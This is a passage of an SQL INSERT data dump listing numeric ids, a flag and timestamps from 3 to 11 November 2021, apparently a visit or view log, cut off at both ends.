13:01:36'),(37658,1586,1,'2021-11-03','2021-11-03 13:03:41'),(37659,2989,1,'2021-11-03','2021-11-03 13:23:36'),(37660,4454,1,'2021-11-03','2021-11-03 13:53:24'),(37661,68,1,'2021-11-03','2021-11-03 14:03:40'),(37662,76,1,'2021-11-03','2021-11-03 14:04:26'),(37663,2457,1,'2021-11-03','2021-11-03 14:04:47'),(37664,1602,1,'2021-11-03','2021-11-03 15:40:18'),(37665,473,1,'2021-11-03','2021-11-03 15:52:49'),(37666,3030,1,'2021-11-03','2021-11-03 16:49:35'),(37667,3781,1,'2021-11-03','2021-11-03 17:15:15'),(37668,3226,1,'2021-11-03','2021-11-03 18:13:46'),(37669,68,1,'2021-11-03','2021-11-03 18:14:15'),(37670,91,1,'2021-11-03','2021-11-03 18:14:28'),(37671,4387,1,'2021-11-03','2021-11-03 18:15:25'),(37672,4387,1,'2021-11-03','2021-11-03 18:15:27'),(37673,72,1,'2021-11-03','2021-11-03 18:26:58'),(37674,3674,1,'2021-11-03','2021-11-03 19:22:33'),(37675,1608,1,'2021-11-03','2021-11-03 19:45:02'),(37676,2410,1,'2021-11-03','2021-11-03 20:21:52'),(37677,1586,1,'2021-11-03','2021-11-03 21:04:40'),(37678,2989,1,'2021-11-03','2021-11-03 21:07:09'),(37679,3109,1,'2021-11-03','2021-11-03 21:44:27'),(37680,1612,1,'2021-11-03','2021-11-03 21:46:15'),(37681,4326,1,'2021-11-03','2021-11-03 22:24:28'),(37682,3781,1,'2021-11-03','2021-11-03 22:40:13'),(37683,4454,1,'2021-11-03','2021-11-03 23:34:42'),(37684,4457,1,'2021-11-04','2021-11-04 00:00:46'),(37685,76,1,'2021-11-04','2021-11-04 00:01:21'),(37686,4457,1,'2021-11-04','2021-11-04 00:01:36'),(37687,4404,1,'2021-11-04','2021-11-04 00:10:20'),(37688,472,1,'2021-11-04','2021-11-04 02:08:18'),(37689,72,1,'2021-11-04','2021-11-04 02:54:08'),(37690,1608,1,'2021-11-04','2021-11-04 04:56:24'),(37691,3438,1,'2021-11-04','2021-11-04 06:18:31'),(37692,4457,1,'2021-11-04','2021-11-04 07:44:10'),(37693,3430,1,'2021-11-04','2021-11-04 08:32:04'),(37694,1600,1,'2021-11-04','2021-11-04 09:14:12'),(37695,3764,1,'2021-11-04','2021-11-04 09:51:55'),(37696,1602,1,'2021-11-04','2021-11-04 09:59:00'),(37697,1600,1,'2021-11-04','2021-11-04 09:59:43'),(37698,570,1,'2021-11-04','2021-11-04 10:22:27'),(37699,570,1,'2021-11-04','2021-11-04 10:22:37'),(37700,1612,1,'2021-11-04','2021-11-04 11:08:57'),(37701,72,1,'2021-11-04','2021-11-04 11:11:12'),(37702,1592,1,'2021-11-04','2021-11-04 11:24:04'),(37703,1596,1,'2021-11-04','2021-11-04 11:37:31'),(37704,76,1,'2021-11-04','2021-11-04 12:10:08'),(37705,80,1,'2021-11-04','2021-11-04 12:11:10'),(37706,2419,1,'2021-11-04','2021-11-04 12:13:19'),(37707,80,1,'2021-11-04','2021-11-04 12:13:30'),(37708,76,1,'2021-11-04','2021-11-04 12:14:36'),(37709,68,1,'2021-11-04','2021-11-04 12:14:49'),(37710,1608,1,'2021-11-04','2021-11-04 13:02:16'),(37711,1600,1,'2021-11-04','2021-11-04 13:22:04'),(37712,2904,1,'2021-11-04','2021-11-04 13:41:01'),(37713,1582,1,'2021-11-04','2021-11-04 13:54:45'),(37714,1602,1,'2021-11-04','2021-11-04 14:11:52'),(37715,76,1,'2021-11-04','2021-11-04 14:18:17'),(37716,2904,1,'2021-11-04','2021-11-04 14:18:56'),(37717,2904,1,'2021-11-04','2021-11-04 14:19:56'),(37718,2904,1,'2021-11-04','2021-11-04 14:20:04'),(37719,84,1,'2021-11-04','2021-11-04 15:28:00'),(37720,3030,1,'2021-11-04','2021-11-04 16:55:54'),(37721,1608,1,'2021-11-04','2021-11-04 17:15:13'),(37722,3721,1,'2021-11-04','2021-11-04 19:11:59'),(37723,3764,1,'2021-11-04','2021-11-04 19:38:23'),(37724,72,1,'2021-11-04','2021-11-04 19:45:59'),(37725,3691,1,'2021-11-04','2021-11-04 20:06:48'),(37726,4457,1,'2021-11-04','2021-11-04 21:37:56'),(37727,1586,1,'2021-11-04','2021-11-04 22:48:42'),(37728,467,1,'2021-11-05','2021-11-05 01:38:37'),(37729,4238,1,'2021-11-05','2021-11-05 03:41:06'),(37730,72,1,'2021-11-05','2021-11-05 04:40:12'),(37731,1608,1,'2021-11-05','2021-11-05 05:08:17'),(37732,2419,1,'2021-11-05','2021-11-05 05:15:01'),(37733,4341,1,'2021-11-05','2021-11-05 06:34:56'),(37734,3282,1,'2021-11-05','2021-11-05 06:35:20'),(37735,1606,1,'2021-11-05','2021-11-05 06:59:43'),(37736,1606,1,'2021-11-05','2021-11-05 07:02:45'),(37737,488,1,'2021-11-05','2021-11-05 07:55:58'),(37738,1602,1,'2021-11-05','2021-11-05 08:41:45'),(37739,1711,1,'2021-11-05','2021-11-05 08:50:18'),(37740,68,1,'2021-11-05','2021-11-05 08:58:49'),(37741,1602,1,'2021-11-05','2021-11-05 10:35:57'),(37742,1594,1,'2021-11-05','2021-11-05 10:51:21'),(37743,1588,1,'2021-11-05','2021-11-05 11:08:32'),(37744,4457,1,'2021-11-05','2021-11-05 11:08:52'),(37745,2148,1,'2021-11-05','2021-11-05 11:28:51'),(37746,2148,1,'2021-11-05','2021-11-05 11:29:07'),(37747,2148,1,'2021-11-05','2021-11-05 11:29:17'),(37748,76,1,'2021-11-05','2021-11-05 13:44:59'),(37749,4335,1,'2021-11-05','2021-11-05 13:48:57'),(37750,76,1,'2021-11-05','2021-11-05 13:50:37'),(37751,3764,1,'2021-11-05','2021-11-05 14:47:52'),(37752,3534,1,'2021-11-05','2021-11-05 15:44:08'),(37753,1608,1,'2021-11-05','2021-11-05 16:09:14'),(37754,1602,1,'2021-11-05','2021-11-05 16:56:14'),(37755,1602,1,'2021-11-05','2021-11-05 16:56:19'),(37756,3313,1,'2021-11-05','2021-11-05 17:20:02'),(37757,84,1,'2021-11-05','2021-11-05 17:39:54'),(37758,2410,1,'2021-11-05','2021-11-05 17:55:46'),(37759,2063,1,'2021-11-05','2021-11-05 18:22:34'),(37760,1695,1,'2021-11-05','2021-11-05 18:30:44'),(37761,80,1,'2021-11-05','2021-11-05 18:40:35'),(37762,4457,1,'2021-11-05','2021-11-05 18:54:02'),(37763,1610,1,'2021-11-05','2021-11-05 19:35:58'),(37764,1608,1,'2021-11-05','2021-11-05 19:39:57'),(37765,2989,1,'2021-11-05','2021-11-05 20:09:14'),(37766,3282,1,'2021-11-05','2021-11-05 20:18:30'),(37767,3282,1,'2021-11-05','2021-11-05 20:20:12'),(37768,1728,1,'2021-11-05','2021-11-05 20:23:05'),(37769,1728,1,'2021-11-05','2021-11-05 20:23:34'),(37770,1728,1,'2021-11-05','2021-11-05 20:24:35'),(37771,72,1,'2021-11-05','2021-11-05 21:19:26'),(37772,3531,1,'2021-11-05','2021-11-05 21:38:48'),(37773,2159,1,'2021-11-05','2021-11-05 21:40:11'),(37774,3030,1,'2021-11-06','2021-11-06 00:33:53'),(37775,2503,1,'2021-11-06','2021-11-06 00:50:38'),(37776,4457,1,'2021-11-06','2021-11-06 01:03:38'),(37777,80,1,'2021-11-06','2021-11-06 01:04:19'),(37778,4457,1,'2021-11-06','2021-11-06 01:04:45'),(37779,1602,1,'2021-11-06','2021-11-06 05:58:37'),(37780,3438,1,'2021-11-06','2021-11-06 06:56:27'),(37781,2989,1,'2021-11-06','2021-11-06 07:06:19'),(37782,1699,1,'2021-11-06','2021-11-06 07:23:30'),(37783,3706,1,'2021-11-06','2021-11-06 07:30:42'),(37784,1586,1,'2021-11-06','2021-11-06 07:48:55'),(37785,3706,1,'2021-11-06','2021-11-06 08:54:04'),(37786,1724,1,'2021-11-06','2021-11-06 11:15:55'),(37787,1730,1,'2021-11-06','2021-11-06 12:20:12'),(37788,1730,1,'2021-11-06','2021-11-06 12:20:33'),(37789,1730,1,'2021-11-06','2021-11-06 12:21:10'),(37790,4457,1,'2021-11-06','2021-11-06 12:41:00'),(37791,87,1,'2021-11-06','2021-11-06 12:56:50'),(37792,3030,1,'2021-11-06','2021-11-06 13:23:44'),(37793,4457,1,'2021-11-06','2021-11-06 14:04:52'),(37794,2704,1,'2021-11-06','2021-11-06 14:07:26'),(37795,72,1,'2021-11-06','2021-11-06 14:11:50'),(37796,2609,1,'2021-11-06','2021-11-06 14:24:03'),(37797,2609,1,'2021-11-06','2021-11-06 14:25:37'),(37798,2609,1,'2021-11-06','2021-11-06 14:25:43'),(37799,2609,1,'2021-11-06','2021-11-06 14:44:04'),(37800,473,1,'2021-11-06','2021-11-06 15:00:34'),(37801,2309,1,'2021-11-06','2021-11-06 15:02:12'),(37802,1614,1,'2021-11-06','2021-11-06 17:01:32'),(37803,1602,1,'2021-11-06','2021-11-06 17:03:51'),(37804,1711,1,'2021-11-06','2021-11-06 17:20:33'),(37805,2617,1,'2021-11-06','2021-11-06 17:20:35'),(37806,4323,1,'2021-11-06','2021-11-06 17:34:28'),(37807,3710,1,'2021-11-06','2021-11-06 18:15:21'),(37808,1582,1,'2021-11-06','2021-11-06 18:19:09'),(37809,2309,1,'2021-11-06','2021-11-06 19:08:31'),(37810,1614,1,'2021-11-06','2021-11-06 19:19:48'),(37811,2769,1,'2021-11-06','2021-11-06 19:32:51'),(37812,2252,1,'2021-11-06','2021-11-06 20:04:04'),(37813,1612,1,'2021-11-06','2021-11-06 20:31:59'),(37814,2989,1,'2021-11-06','2021-11-06 21:21:35'),(37815,1588,1,'2021-11-06','2021-11-06 21:41:37'),(37816,1600,1,'2021-11-06','2021-11-06 21:41:44'),(37817,1600,1,'2021-11-06','2021-11-06 22:53:36'),(37818,80,1,'2021-11-06','2021-11-06 23:20:10'),(37819,1612,1,'2021-11-07','2021-11-07 00:36:02'),(37820,80,1,'2021-11-07','2021-11-07 00:36:22'),(37821,4457,1,'2021-11-07','2021-11-07 02:06:15'),(37822,87,1,'2021-11-07','2021-11-07 02:07:55'),(37823,477,1,'2021-11-07','2021-11-07 02:08:58'),(37824,87,1,'2021-11-07','2021-11-07 02:09:11'),(37825,468,1,'2021-11-07','2021-11-07 02:39:52'),(37826,3710,1,'2021-11-07','2021-11-07 03:14:57'),(37827,1600,1,'2021-11-07','2021-11-07 04:12:23'),(37828,1586,1,'2021-11-07','2021-11-07 04:22:30'),(37829,3045,1,'2021-11-07','2021-11-07 04:46:40'),(37830,1718,1,'2021-11-07','2021-11-07 04:50:17'),(37831,570,1,'2021-11-07','2021-11-07 05:18:37'),(37832,3764,1,'2021-11-07','2021-11-07 06:16:34'),(37833,72,1,'2021-11-07','2021-11-07 06:24:30'),(37834,4335,1,'2021-11-07','2021-11-07 06:29:12'),(37835,3030,1,'2021-11-07','2021-11-07 08:24:01'),(37836,2658,1,'2021-11-07','2021-11-07 08:25:58'),(37837,1598,1,'2021-11-07','2021-11-07 08:48:16'),(37838,4238,1,'2021-11-07','2021-11-07 08:50:16'),(37839,1598,1,'2021-11-07','2021-11-07 08:50:29'),(37840,1604,1,'2021-11-07','2021-11-07 08:56:04'),(37841,68,1,'2021-11-07','2021-11-07 09:16:21'),(37842,84,1,'2021-11-07','2021-11-07 09:18:46'),(37843,72,1,'2021-11-07','2021-11-07 09:26:55'),(37844,72,1,'2021-11-07','2021-11-07 09:33:07'),(37845,4348,1,'2021-11-07','2021-11-07 09:39:33'),(37846,72,1,'2021-11-07','2021-11-07 09:40:10'),(37847,72,1,'2021-11-07','2021-11-07 09:54:13'),(37848,72,1,'2021-11-07','2021-11-07 09:56:36'),(37849,72,1,'2021-11-07','2021-11-07 09:56:55'),(37850,2159,1,'2021-11-07','2021-11-07 10:10:09'),(37851,2159,1,'2021-11-07','2021-11-07 10:11:03'),(37852,72,1,'2021-11-07','2021-11-07 10:22:23'),(37853,72,1,'2021-11-07','2021-11-07 10:29:25'),(37854,1728,1,'2021-11-07','2021-11-07 11:15:53'),(37855,1728,1,'2021-11-07','2021-11-07 11:16:13'),(37856,1728,1,'2021-11-07','2021-11-07 11:16:51'),(37857,74,1,'2021-11-07','2021-11-07 11:17:08'),(37858,1728,1,'2021-11-07','2021-11-07 11:17:29'),(37859,1728,1,'2021-11-07','2021-11-07 11:17:54'),(37860,72,1,'2021-11-07','2021-11-07 11:24:42'),(37861,1728,1,'2021-11-07','2021-11-07 11:27:04'),(37862,76,1,'2021-11-07','2021-11-07 11:29:29'),(37863,1594,1,'2021-11-07','2021-11-07 12:38:31'),(37864,72,1,'2021-11-07','2021-11-07 12:58:07'),(37865,72,1,'2021-11-07','2021-11-07 13:07:03'),(37866,4348,1,'2021-11-07','2021-11-07 13:10:15'),(37867,80,1,'2021-11-07','2021-11-07 14:52:31'),(37868,3041,1,'2021-11-07','2021-11-07 15:47:24'),(37869,3482,1,'2021-11-07','2021-11-07 15:49:57'),(37870,1594,1,'2021-11-07','2021-11-07 16:26:21'),(37871,4416,1,'2021-11-07','2021-11-07 16:33:17'),(37872,4416,1,'2021-11-07','2021-11-07 16:34:47'),(37873,2457,1,'2021-11-07','2021-11-07 16:35:46'),(37874,4416,1,'2021-11-07','2021-11-07 16:36:21'),(37875,4396,1,'2021-11-07','2021-11-07 17:19:43'),(37876,3030,1,'2021-11-07','2021-11-07 17:54:43'),(37877,3531,1,'2021-11-07','2021-11-07 17:55:37'),(37878,87,1,'2021-11-07','2021-11-07 18:01:39'),(37879,1604,1,'2021-11-07','2021-11-07 18:25:28'),(37880,3764,1,'2021-11-07','2021-11-07 19:34:28'),(37881,3271,1,'2021-11-07','2021-11-07 19:54:14'),(37882,3271,1,'2021-11-07','2021-11-07 19:54:18'),(37883,3271,1,'2021-11-07','2021-11-07 19:54:21'),(37884,3764,1,'2021-11-07','2021-11-07 20:03:33'),(37885,4457,1,'2021-11-07','2021-11-07 20:27:10'),(37886,1602,1,'2021-11-07','2021-11-07 21:07:33'),(37887,1586,1,'2021-11-07','2021-11-07 21:49:11'),(37888,2704,1,'2021-11-07','2021-11-07 23:15:12'),(37889,1711,1,'2021-11-07','2021-11-07 23:55:47'),(37890,72,1,'2021-11-08','2021-11-08 00:04:43'),(37891,2989,1,'2021-11-08','2021-11-08 03:17:17'),(37892,2989,1,'2021-11-08','2021-11-08 03:17:55'),(37893,1872,1,'2021-11-08','2021-11-08 03:59:19'),(37894,1598,1,'2021-11-08','2021-11-08 05:10:49'),(37895,4457,1,'2021-11-08','2021-11-08 05:44:41'),(37896,3313,1,'2021-11-08','2021-11-08 06:11:17'),(37897,1870,1,'2021-11-08','2021-11-08 06:17:53'),(37898,4457,1,'2021-11-08','2021-11-08 06:46:35'),(37899,108,1,'2021-11-08','2021-11-08 06:55:03'),(37900,2769,1,'2021-11-08','2021-11-08 07:18:58'),(37901,2769,1,'2021-11-08','2021-11-08 07:20:43'),(37902,4457,1,'2021-11-08','2021-11-08 08:07:25'),(37903,1739,1,'2021-11-08','2021-11-08 08:10:22'),(37904,472,1,'2021-11-08','2021-11-08 08:46:48'),(37905,3282,1,'2021-11-08','2021-11-08 09:12:58'),(37906,2993,1,'2021-11-08','2021-11-08 10:37:29'),(37907,4454,1,'2021-11-08','2021-11-08 11:02:50'),(37908,2804,1,'2021-11-08','2021-11-08 11:14:47'),(37909,1726,1,'2021-11-08','2021-11-08 12:59:15'),(37910,1726,1,'2021-11-08','2021-11-08 12:59:31'),(37911,1726,1,'2021-11-08','2021-11-08 12:59:54'),(37912,3764,1,'2021-11-08','2021-11-08 13:04:14'),(37913,4416,1,'2021-11-08','2021-11-08 13:09:29'),(37914,1600,1,'2021-11-08','2021-11-08 13:14:47'),(37915,1612,1,'2021-11-08','2021-11-08 13:56:33'),(37916,76,1,'2021-11-08','2021-11-08 14:02:09'),(37917,1612,1,'2021-11-08','2021-11-08 14:04:50'),(37918,1612,1,'2021-11-08','2021-11-08 14:10:10'),(37919,76,1,'2021-11-08','2021-11-08 14:10:33'),(37920,3117,1,'2021-11-08','2021-11-08 14:40:39'),(37921,89,1,'2021-11-08','2021-11-08 15:21:22'),(37922,1606,1,'2021-11-08','2021-11-08 15:21:58'),(37923,3752,1,'2021-11-08','2021-11-08 15:58:18'),(37924,4457,1,'2021-11-08','2021-11-08 16:19:37'),(37925,1586,1,'2021-11-08','2021-11-08 16:22:34'),(37926,1749,1,'2021-11-08','2021-11-08 17:26:53'),(37927,80,1,'2021-11-08','2021-11-08 17:33:02'),(37928,2309,1,'2021-11-08','2021-11-08 18:42:29'),(37929,91,1,'2021-11-08','2021-11-08 19:05:38'),(37930,3030,1,'2021-11-08','2021-11-08 19:06:23'),(37931,91,1,'2021-11-08','2021-11-08 19:06:33'),(37932,2309,1,'2021-11-08','2021-11-08 20:03:59'),(37933,3030,1,'2021-11-08','2021-11-08 20:10:54'),(37934,3087,1,'2021-11-08','2021-11-08 21:06:01'),(37935,478,1,'2021-11-08','2021-11-08 21:32:14'),(37936,4326,1,'2021-11-08','2021-11-08 21:36:08'),(37937,4457,1,'2021-11-08','2021-11-08 21:54:31'),(37938,91,1,'2021-11-08','2021-11-08 22:16:26'),(37939,1602,1,'2021-11-08','2021-11-08 23:29:47'),(37940,80,1,'2021-11-09','2021-11-09 01:04:53'),(37941,1739,1,'2021-11-09','2021-11-09 01:19:10'),(37942,2297,1,'2021-11-09','2021-11-09 02:42:14'),(37943,3087,1,'2021-11-09','2021-11-09 02:56:58'),(37944,1582,1,'2021-11-09','2021-11-09 03:07:42'),(37945,3109,1,'2021-11-09','2021-11-09 03:13:37'),(37946,1598,1,'2021-11-09','2021-11-09 03:30:03'),(37947,3045,1,'2021-11-09','2021-11-09 04:52:23'),(37948,4457,1,'2021-11-09','2021-11-09 06:03:41'),(37949,4412,1,'2021-11-09','2021-11-09 06:57:57'),(37950,1766,1,'2021-11-09','2021-11-09 07:30:16'),(37951,1766,1,'2021-11-09','2021-11-09 07:30:28'),(37952,1747,1,'2021-11-09','2021-11-09 07:31:46'),(37953,3060,1,'2021-11-09','2021-11-09 08:13:34'),(37954,1602,1,'2021-11-09','2021-11-09 08:33:03'),(37955,1544,1,'2021-11-09','2021-11-09 08:35:27'),(37956,3030,1,'2021-11-09','2021-11-09 09:18:35'),(37957,1612,1,'2021-11-09','2021-11-09 09:30:12'),(37958,72,1,'2021-11-09','2021-11-09 09:34:23'),(37959,4457,1,'2021-11-09','2021-11-09 09:52:28'),(37960,89,1,'2021-11-09','2021-11-09 09:52:57'),(37961,89,1,'2021-11-09','2021-11-09 09:53:36'),(37962,1600,1,'2021-11-09','2021-11-09 10:24:25'),(37963,4457,1,'2021-11-09','2021-11-09 10:47:16'),(37964,3486,1,'2021-11-09','2021-11-09 11:03:07'),(37965,1594,1,'2021-11-09','2021-11-09 11:24:29'),(37966,1594,1,'2021-11-09','2021-11-09 11:27:35'),(37967,1600,1,'2021-11-09','2021-11-09 11:34:58'),(37968,2457,1,'2021-11-09','2021-11-09 11:45:19'),(37969,472,1,'2021-11-09','2021-11-09 12:36:21'),(37970,1602,1,'2021-11-09','2021-11-09 13:07:51'),(37971,1728,1,'2021-11-09','2021-11-09 13:13:36'),(37972,1728,1,'2021-11-09','2021-11-09 13:14:05'),(37973,1728,1,'2021-11-09','2021-11-09 13:16:14'),(37974,3030,1,'2021-11-09','2021-11-09 13:46:18'),(37975,3030,1,'2021-11-09','2021-11-09 13:47:07'),(37976,4457,1,'2021-11-09','2021-11-09 13:48:40'),(37977,3034,1,'2021-11-09','2021-11-09 13:49:06'),(37978,3030,1,'2021-11-09','2021-11-09 13:49:52'),(37979,3097,1,'2021-11-09','2021-11-09 14:24:39'),(37980,4301,1,'2021-11-09','2021-11-09 14:48:52'),(37981,1774,1,'2021-11-09','2021-11-09 15:14:20'),(37982,108,1,'2021-11-09','2021-11-09 15:48:53'),(37983,3060,1,'2021-11-09','2021-11-09 15:48:54'),(37984,80,1,'2021-11-09','2021-11-09 15:49:12'),(37985,91,1,'2021-11-09','2021-11-09 16:07:01'),(37986,473,1,'2021-11-09','2021-11-09 16:07:31'),(37987,335,1,'2021-11-09','2021-11-09 16:08:13'),(37988,2156,1,'2021-11-09','2021-11-09 16:08:42'),(37989,1612,1,'2021-11-09','2021-11-09 16:42:30'),(37990,1606,1,'2021-11-09','2021-11-09 17:08:18'),(37991,1598,1,'2021-11-09','2021-11-09 17:18:20'),(37992,2457,1,'2021-11-09','2021-11-09 17:50:26'),(37993,72,1,'2021-11-09','2021-11-09 18:00:53'),(37994,3316,1,'2021-11-09','2021-11-09 18:25:12'),(37995,2813,1,'2021-11-09','2021-11-09 18:50:08'),(37996,2704,1,'2021-11-09','2021-11-09 19:20:40'),(37997,2993,1,'2021-11-09','2021-11-09 19:40:52'),(37998,2178,1,'2021-11-09','2021-11-09 20:23:17'),(37999,2178,1,'2021-11-09','2021-11-09 20:23:36'),(38000,2309,1,'2021-11-09','2021-11-09 20:49:50'),(38001,68,1,'2021-11-09','2021-11-09 22:35:32'),(38002,89,1,'2021-11-09','2021-11-09 22:44:33'),(38003,80,1,'2021-11-09','2021-11-09 22:45:15'),(38004,468,1,'2021-11-09','2021-11-09 22:50:35'),(38005,468,1,'2021-11-10','2021-11-10 00:00:29'),(38006,3482,1,'2021-11-10','2021-11-10 00:22:03'),(38007,72,1,'2021-11-10','2021-11-10 00:53:21'),(38008,4335,1,'2021-11-10','2021-11-10 01:25:08'),(38009,487,1,'2021-11-10','2021-11-10 01:38:26'),(38010,570,1,'2021-11-10','2021-11-10 03:15:29'),(38011,1602,1,'2021-11-10','2021-11-10 04:34:54'),(38012,1606,1,'2021-11-10','2021-11-10 04:45:01'),(38013,2609,1,'2021-11-10','2021-11-10 06:00:00'),(38014,2609,1,'2021-11-10','2021-11-10 06:34:59'),(38015,1586,1,'2021-11-10','2021-11-10 06:36:01'),(38016,3285,1,'2021-11-10','2021-11-10 06:54:53'),(38017,2457,1,'2021-11-10','2021-11-10 07:00:35'),(38018,1610,1,'2021-11-10','2021-11-10 07:16:28'),(38019,1610,1,'2021-11-10','2021-11-10 07:17:31'),(38020,4391,1,'2021-11-10','2021-11-10 07:23:25'),(38021,2965,1,'2021-11-10','2021-11-10 07:46:12'),(38022,72,1,'2021-11-10','2021-11-10 07:59:13'),(38023,1594,1,'2021-11-10','2021-11-10 08:29:34'),(38024,2309,1,'2021-11-10','2021-11-10 08:52:07'),(38025,3482,1,'2021-11-10','2021-11-10 09:24:36'),(38026,3706,1,'2021-11-10','2021-11-10 09:29:54'),(38027,2309,1,'2021-11-10','2021-11-10 11:09:36'),(38028,1726,1,'2021-11-10','2021-11-10 11:11:34'),(38029,1602,1,'2021-11-10','2021-11-10 11:34:25'),(38030,4357,1,'2021-11-10','2021-11-10 11:34:47'),(38031,1877,1,'2021-11-10','2021-11-10 11:40:53'),(38032,2769,1,'2021-11-10','2021-11-10 12:38:07'),(38033,1598,1,'2021-11-10','2021-11-10 12:43:53'),(38034,3030,1,'2021-11-10','2021-11-10 13:13:13'),(38035,3030,1,'2021-11-10','2021-11-10 13:13:37'),(38036,4457,1,'2021-11-10','2021-11-10 13:14:40'),(38037,1598,1,'2021-11-10','2021-11-10 13:23:47'),(38038,4335,1,'2021-11-10','2021-11-10 13:29:10'),(38039,3102,1,'2021-11-10','2021-11-10 13:31:39'),(38040,487,1,'2021-11-10','2021-11-10 13:45:44'),(38041,487,1,'2021-11-10','2021-11-10 13:46:19'),(38042,4238,1,'2021-11-10','2021-11-10 13:52:34'),(38043,467,1,'2021-11-10','2021-11-10 13:59:36'),(38044,4238,1,'2021-11-10','2021-11-10 14:05:48'),(38045,4457,1,'2021-11-10','2021-11-10 15:11:38'),(38046,1600,1,'2021-11-10','2021-11-10 15:29:52'),(38047,2457,1,'2021-11-10','2021-11-10 15:32:07'),(38048,467,1,'2021-11-10','2021-11-10 15:50:18'),(38049,2457,1,'2021-11-10','2021-11-10 15:50:23'),(38050,1606,1,'2021-11-10','2021-11-10 15:51:13'),(38051,1747,1,'2021-11-10','2021-11-10 15:53:09'),(38052,3034,1,'2021-11-10','2021-11-10 16:35:17'),(38053,4326,1,'2021-11-10','2021-11-10 16:36:07'),(38054,2159,1,'2021-11-10','2021-11-10 16:54:20'),(38055,1606,1,'2021-11-10','2021-11-10 16:57:39'),(38056,80,1,'2021-11-10','2021-11-10 16:57:47'),(38057,72,1,'2021-11-10','2021-11-10 16:57:57'),(38058,87,1,'2021-11-10','2021-11-10 16:59:35'),(38059,1749,1,'2021-11-10','2021-11-10 17:07:17'),(38060,2297,1,'2021-11-10','2021-11-10 17:20:24'),(38061,108,1,'2021-11-10','2021-11-10 17:21:11'),(38062,2159,1,'2021-11-10','2021-11-10 17:38:17'),(38063,2419,1,'2021-11-10','2021-11-10 17:48:49'),(38064,1604,1,'2021-11-10','2021-11-10 18:13:04'),(38065,2658,1,'2021-11-10','2021-11-10 18:22:13'),(38066,1776,1,'2021-11-10','2021-11-10 18:22:16'),(38067,4332,1,'2021-11-10','2021-11-10 18:35:41'),(38068,3764,1,'2021-11-10','2021-11-10 19:43:31'),(38069,3764,1,'2021-11-10','2021-11-10 19:46:32'),(38070,1598,1,'2021-11-10','2021-11-10 20:01:37'),(38071,3691,1,'2021-11-10','2021-11-10 20:08:36'),(38072,3691,1,'2021-11-10','2021-11-10 20:11:00'),(38073,3030,1,'2021-11-10','2021-11-10 20:11:11'),(38074,4457,1,'2021-11-10','2021-11-10 20:11:12'),(38075,1602,1,'2021-11-10','2021-11-10 20:15:32'),(38076,2154,1,'2021-11-10','2021-11-10 20:25:39'),(38077,468,1,'2021-11-10','2021-11-10 20:37:05'),(38078,3127,1,'2021-11-10','2021-11-10 20:55:39'),(38079,4457,1,'2021-11-10','2021-11-10 21:22:42'),(38080,4457,1,'2021-11-10','2021-11-10 21:23:59'),(38081,478,1,'2021-11-10','2021-11-10 21:53:42'),(38082,1600,1,'2021-11-10','2021-11-10 21:55:38'),(38083,1600,1,'2021-11-10','2021-11-10 21:57:24'),(38084,3675,1,'2021-11-10','2021-11-10 22:21:38'),(38085,3127,1,'2021-11-10','2021-11-10 22:23:46'),(38086,478,1,'2021-11-10','2021-11-10 22:34:02'),(38087,484,1,'2021-11-10','2021-11-10 23:18:04'),(38088,80,1,'2021-11-11','2021-11-11 00:16:20'),(38089,1728,1,'2021-11-11','2021-11-11 00:33:16'),(38090,1728,1,'2021-11-11','2021-11-11 00:33:34'),(38091,1728,1,'2021-11-11','2021-11-11 00:33:59'),(38092,1600,1,'2021-11-11','2021-11-11 00:38:20'),(38093,3746,1,'2021-11-11','2021-11-11 02:32:07'),(38094,1870,1,'2021-11-11','2021-11-11 03:36:52'),(38095,1586,1,'2021-11-11','2021-11-11 03:57:27'),(38096,3724,1,'2021-11-11','2021-11-11 04:00:43'),(38097,2309,1,'2021-11-11','2021-11-11 04:12:57'),(38098,3710,1,'2021-11-11','2021-11-11 04:19:35'),(38099,2769,1,'2021-11-11','2021-11-11 04:27:56'),(38100,1614,1,'2021-11-11','2021-11-11 05:06:54'),(38101,3271,1,'2021-11-11','2021-11-11 05:16:24'),(38102,3271,1,'2021-11-11','2021-11-11 05:23:29'),(38103,68,1,'2021-11-11','2021-11-11 05:55:04'),(38104,1747,1,'2021-11-11','2021-11-11 05:58:57'),(38105,2148,1,'2021-11-11','2021-11-11 06:09:02'),(38106,2148,1,'2021-11-11','2021-11-11 06:22:41'),(38107,1586,1,'2021-11-11','2021-11-11 06:38:28'),(38108,1600,1,'2021-11-11','2021-11-11 06:43:13'),(38109,1600,1,'2021-11-11','2021-11-11 06:44:03'),(38110,469,1,'2021-11-11','2021-11-11 06:48:20'),(38111,89,1,'2021-11-11','2021-11-11 06:51:18'),(38112,3251,1,'2021-11-11','2021-11-11 07:15:08'),(38113,2989,1,'2021-11-11','2021-11-11 07:44:29'),(38114,1608,1,'2021-11-11','2021-11-11 07:55:38'),(38115,4420,1,'2021-11-11','2021-11-11 07:56:59'),(38116,1739,1,'2021-11-11','2021-11-11 08:14:50'),(38117,468,1,'2021-11-11','2021-11-11 08:37:18'),(38118,3282,1,'2021-11-11','2021-11-11 09:34:05'),(38119,80,1,'2021-11-11','2021-11-11 09:42:35'),(38120,3045,1,'2021-11-11','2021-11-11 09:54:07'),(38121,1606,1,'2021-11-11','2021-11-11 10:20:54'),(38122,3030,1,'2021-11-11','2021-11-11 10:24:58'),(38123,68,1,'2021-11-11','2021-11-11 10:25:06'),(38124,3282,1,'2021-11-11','2021-11-11 10:31:49'),(38125,1872,1,'2021-11-11','2021-11-11 10:37:00'),(38126,4457,1,'2021-11-11','2021-11-11 11:02:07'),(38127,1602,1,'2021-11-11','2021-11-11 11:04:04'),(38128,1586,1,'2021-11-11','2021-11-11 11:06:00'),(38129,2309,1,'2021-11-11','2021-11-11 11:27:20'),(38130,2159,1,'2021-11-11','2021-11-11 11:55:26'),(38131,4424,1,'2021-11-11','2021-11-11 11:56:48'),(38132,1726,1,'2021-11-11','2021-11-11 12:39:18'),(38133,4457,1,'2021-11-11','2021-11-11 13:02:36'),(38134,1594,1,'2021-11-11','2021-11-11 13:03:54'),(38135,1592,1,'2021-11-11','2021-11-11 13:14:49'),(38136,3664,1,'2021-11-11','2021-11-11 13:24:56'),(38137,3664,1,'2021-11-11','2021-11-11 13:26:12'),(38138,3030,1,'2021-11-11','2021-11-11 13:48:53'),(38139,2309,1,'2021-11-11','2021-11-11 13:49:30'),(38140,2804,1,'2021-11-11','2021-11-11 14:11:08'),(38141,68,1,'2021-11-11','2021-11-11 14:36:58'),(38142,4457,1,'2021-11-11','2021-11-11 14:52:07'),(38143,68,1,'2021-11-11','2021-11-11 14:52:30'),(38144,4457,1,'2021-11-11','2021-11-11 